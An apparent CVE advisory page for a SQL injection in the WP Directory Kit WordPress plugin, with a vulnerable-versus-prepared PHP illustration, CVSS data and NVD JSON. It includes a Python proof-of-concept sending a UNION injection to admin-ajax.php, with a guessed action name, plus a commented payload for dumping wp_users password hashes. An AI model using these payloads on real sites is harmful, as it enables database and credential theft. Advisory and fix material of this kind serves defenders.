Security Vulnerability Report
CVE-2025-13090 CVSS 4.9 MEDIUM

Published: 2025-12-02 12:16:18
Last Modified: 2026-04-15 00:35:42

Description

The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'search' parameter in all versions up to, and including, 1.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
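The description names two root causes: the user-supplied `search` value is not adequately escaped, and the query it lands in is not prepared. The following is an added illustration written for this page, not the plugin's code or its patch; the table name `wdk_listings`, the column names and the function names are assumptions. It places the query shape the advisory describes beside the prepared-statement form that closes the issue in WordPress.

```php
<?php
// Added example, not WP Directory Kit source. Table and column names are
// assumed for illustration only.

// Vulnerable pattern (CWE-89): the search term is concatenated straight into
// the SQL text. Any quote in $search ends the string literal and the rest of
// the value is parsed as SQL.
function wdk_search_unsafe( $search ) {
    global $wpdb;
    $sql = "SELECT id, title FROM {$wpdb->prefix}wdk_listings "
         . "WHERE title LIKE '%" . $search . "%'";
    return $wpdb->get_results( $sql );
}

// Hardened pattern: $wpdb->prepare() binds the value through a %s placeholder,
// so it can never change the structure of the statement. $wpdb->esc_like()
// additionally neutralises LIKE metacharacters (% and _) in the term before
// the wildcards are added, which escaping alone does not address.
function wdk_search_safe( $search ) {
    global $wpdb;
    $like = '%' . $wpdb->esc_like( $search ) . '%';
    $sql  = $wpdb->prepare(
        "SELECT id, title FROM {$wpdb->prefix}wdk_listings WHERE title LIKE %s",
        $like
    );
    return $wpdb->get_results( $sql );
}
```

Escaping with `esc_sql()` depends on every query that consumes the value wrapping it in quotes; binding through `prepare()` holds regardless of the surrounding SQL, which is why the CVE text calls out "lack of sufficient preparation" rather than escaping alone. The PR:H in the CVSS vector reflects that the vulnerable handler is only reachable with Administrator-level access, which limits exposure but does not remove it on sites where admin sessions can be stolen or shared.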

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Directory Kit <= 1.4.6 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13090 PoC - WP Directory Kit SQL Injection
# Target: WordPress site with WP Directory Kit plugin <= 1.4.6
# Authentication: Requires Administrator-level access


def exploit_sqli(target_url, search_param):
    """
    SQL Injection payload for CVE-2025-13090
    The 'search' parameter is vulnerable to SQL injection
    """
    # Target endpoint - typically in plugin's search functionality
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # SQL Injection payload - extracts database version
    # Original query is appended with UNION-based injection
    injection_payload = "' UNION SELECT NULL,NULL,@@version,NULL,NULL-- -"

    # Prepare the request parameters
    params = {
        'action': 'wdk_search',  # Common action name for directory search
        'search': injection_payload
    }

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }

    try:
        print(f"[*] Sending SQL injection payload to {endpoint}")
        print(f"[*] Payload: {injection_payload}")

        response = requests.post(endpoint, data=params, headers=headers, timeout=30)

        if response.status_code == 200:
            print("[+] Request sent successfully")
            print(f"[*] Response length: {len(response.text)} bytes")

            # Check for database version in response
            if 'mysql' in response.text.lower() or any(char.isdigit() for char in response.text[:200]):
                print("[+] Potential successful injection detected")
                return response.text[:500]
        else:
            print(f"[-] Request failed with status: {response.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

    return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13090.py <target_url>")
        print("Example: python cve-2025-13090.py https://example.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_sqli(target, 'search')

# Additional payload for extracting users table:
# ' UNION SELECT user_id,user_login,user_pass,user_email,NULL FROM wp_users-- -
#
# Note: This PoC requires valid WordPress administrator session cookie
# Add cookie to request headers:
# headers['Cookie'] = 'wordpress_logged_in_xxx=session_hash'
```

References

- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail=
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3405484%40wpdirectorykit&new=3405484%40wpdirectorykit&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fbf502-2dfb-49e5-94a6-1525aabc08c1?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13090",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-02T12:16:18.280",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'search' parameter in all versions up to, and including, 1.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3405484%40wpdirectorykit&new=3405484%40wpdirectorykit&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fbf502-2dfb-49e5-94a6-1525aabc08c1?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```